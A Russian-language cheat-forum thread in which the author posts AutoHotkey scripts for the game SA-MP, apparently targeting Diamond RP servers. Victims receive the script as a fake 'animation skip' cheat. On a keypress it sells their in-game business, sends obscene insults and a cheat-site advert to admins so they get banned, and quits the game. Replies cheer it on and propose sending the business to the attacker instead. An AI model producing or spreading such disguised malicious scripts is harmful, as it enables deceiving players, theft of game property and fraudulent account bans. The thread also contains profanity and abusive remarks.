Слив бизнеса в Гос. с оскорблением в репорт
|
|
Longich |
Дата: Вторник, 29.03.2016, 19:56 | Сообщение # 1
|
Авторитет
Статус: Offline
|
Доброго времени суток. Данная штуковина продаёт бизнес в гос. а далее, если хотите, чтобы недруг получил бан на 30 дней - отправляет в репорт оскорбления и рекламирует cheat-master, текст конечно можете отредактировать. После всех махинаций прописывает /q
Работает он так: 1. Продаёт бизнес в гос. 2. Пишет в репорт оскорбление администрации и рекламирует cheat-master [Если нужно, то с оскорблениями]. Как пользоваться: 1. Пишем недругу в skype что есть не палевный сбив анимации и даём скачать. 2. Заходим в игру, и говорим "давай потестируем". Недруг жмёт Num1 и бизнес продаётся в гос, и он выходит из игры. Вы покупаете биз и вуаля.
Скачать Alpha: Скачать Скачать Beta:Скачать Активация: Num 1
Версия 1.0 Alpha Возможности: Продажа бизнеса в гос при нажатие одной кнопки, затем выход из игры, жертва не может нажать на паузу и выйти из игры, только если выключить системник.. Недостатки: Продажа через команду "/sellbusiness" и двойном нажатие на "enter"Код Numpad1:: SendMessage, 0x50,, 0x4190419,, A Send, {f6}/sellbusiness{enter} Send, {enter} Sleep 500 Send, {f6}/mn{enter} Sleep, 1000 Send, {down 4}{enter} Sleep, 500 Send, Админы DiamondRP еб**у*ые го**оны, все на cheat-master.ru{enter} Sleep, 2000 Send, {f6}/q{enter} return Версия 1.2 Beta Возможности: Продажа бизнеса, через меню бизнеса, затем оскорбление в репорт и реклама cheat-master;a, жертва не может нажать на паузу и выйти из игры, только если выключить системник.. Недостатки: ОтсутствуютКод Numpad1:: SendMessage, 0x50,, 0x4190419,, A Send, {f6}/business{enter} Sleep 500 Send, {down 5}{enter} Sleep, 500 Send, {enter} Sleep, 500 Send, {f6}/mn{enter} Sleep 500 Send, {down 4}{enter} Sleep 500 Send, TEXT{enter} Sleep, 500 Send, {f6}/q{enter} return
Автор: Longich Идею взял, от: RightDJ
Вконтакте: Кликабельно Steam: Кликабельно [DiamondRP]Мои темы: Кликабельно [AHK]Мои темы: Кликабельно [Вопросы]Задай мне личный вопрос: Кликабельно
Сообщение отредактировал Longich - Понедельник, 18.04.2016, 08:30 |
|
|
|
iFree |
Дата: Вторник, 29.03.2016, 20:03 | Сообщение # 2
|
Боец
|
отличный анх буду издеваться
Аккаунт разрешен администратором AK-47
|
|
|
|
[CM]Kodilo |
Дата: Вторник, 29.03.2016, 23:14 | Сообщение # 3
|
Боец
|
не плохо подобного не видел попробую !

|
|
|
|
Tropical |
Дата: Вторник, 29.03.2016, 23:34 | Сообщение # 4
|
Бывалый
|
Сделал бы так что бы биз сливался на твой ID, и всё его имущества предлагалось бы тебе, а требовалось бы всего то нажимать - "Y" а далее уже слив в репорт)
Сваливаю от сюда.
|
|
|
|
Longich |
Дата: Вторник, 29.03.2016, 23:37 | Сообщение # 5
|
Авторитет
|
Не, тут как ты описал будет херово да и ид твой не всегда укадет.. А так норм идея, но я сделал как лучше
Вконтакте: Кликабельно Steam: Кликабельно [DiamondRP]Мои темы: Кликабельно [AHK]Мои темы: Кликабельно [Вопросы]Задай мне личный вопрос: Кликабельно
|
|
|
|
[Cm]Kartofel |
Дата: Среда, 30.03.2016, 14:57 | Сообщение # 6
|
Любитель
|
вродибы норм чо
|
|
|
|
[CM]Kodilo |
Дата: Среда, 30.03.2016, 15:41 | Сообщение # 7
|
Боец
|
У меня получилось

|
|
|
|
Hide[CM] |
Дата: Среда, 30.03.2016, 16:40 | Сообщение # 8
|
Боец
|
Ахахха АММО ЛС на ДРП моя. Ахахах пацан красавчик!!!
Если о пизде всегда думаешь, то пиздой твоя жизнь и накроется. (с) Архимед
|
|
|
|
Y-3 |
Дата: Среда, 30.03.2016, 16:42 | Сообщение # 9
|
|
Годная тема. А почему-бы не сделать, чтобы "жертва" продавала не в гос, а тебе за 1000 вирт? Так по идеи можно сделать, чтобы сливал биз рядом стоящему id за минимальную цену, вообще бы найс было, так бабки поднимать.
|
|
|
|
Brodyga[CM] |
Дата: Среда, 30.03.2016, 16:53 | Сообщение # 10
|
Боец
|
На всех серверах работает ?
[HD Рюкзак || Парашют || http://cheat-master.ru/forum/108-574650-1
|
|
|
|
Longich |
Дата: Среда, 30.03.2016, 17:20 | Сообщение # 11
|
Авторитет
|
Цитата Y-3 (  ) Годная тема. А почему-бы не сделать, чтобы "жертва" продавала не в гос, а тебе за 1000 вирт? Так по идеи можно сделать, чтобы сливал биз рядом стоящему id за минимальную цену, вообще бы найс было, так бабки поднимать.
1. На Diamond RolePlay своя функция продажи, меньше гос. продать нельзя
2. Что в гос. что на руки, продажа и цена одна и та же
3. Я б так и сделал, если бы не эта защита
Цитата Brodyga[CM] (  ) На всех серверах работает ?
Не знаю, скорее всего, но он сделан для Diamond RolePlay, не знаю на адвансе такая же команда или нет..
|
|
|
|
dron989 |
Дата: Среда, 30.03.2016, 21:53 | Сообщение # 12
|
Любитель
|
Цитата Longich (  ) Не знаю, скорее всего, но он сделан для Diamond RolePlay, не знаю на адвансе такая же команда или нет..
Ты даже не знаешь для какого он сервера сделан. ОМГ. Тебе умные люди пишут (Я). Что скрипт не будет работать (Команда в гос биз не сливает. Ток через меню). + Я проверял на дрп. Я тебе писал рабочий код скрипта тут а ты взял и удалил. Ну ладно. Удаляй крч эту тему. Может он и работает на твоем бета сервере с модом дрп как ты писал. А на дрп не работает.
|
|
|
|
Longich |
Дата: Четверг, 31.03.2016, 07:27 | Сообщение # 13
|
Авторитет
|
Оо боже, вали лесом.. дрон889 Добавлено (31.03.2016, 07:27) ---------------------------------------------
Цитата dron989 Имею. меня бесят твои темы. Сначала проверяй потом другим рассказывай. И еще ава твоя пздц как бесит.
Ты такой хороший, оскорбляешь пользователей сайта, просто вали лесом, и не разводи срач в теме..
|
|
|
|
RussiaForever |
Дата: Четверг, 31.03.2016, 07:44 | Сообщение # 14
|
Новичок
|
Цитата Longich (  ) 1. На Diamond RolePlay своя функция продажи, меньше гос. продать нельзя
2. Что в гос. что на руки, продажа и цена одна и та же
3. Я б так и сделал, если бы не эта защита
Сделай для Сам-рп,по братски:D там можно за меньшую цену продовать
|
|
|
|
Longich |
Дата: Четверг, 31.03.2016, 15:07 | Сообщение # 15
|
Авторитет
|
Цитата RussiaForever (  ) Сделай для Сам-рп,по братски:D там можно за меньшую цену продовать
Конечно сделаю, ожидай :) Тема на слив бизнеса в Гос. Samp-Rp
Сообщение отредактировал Longich - Четверг, 31.03.2016, 15:43 |
|
|
|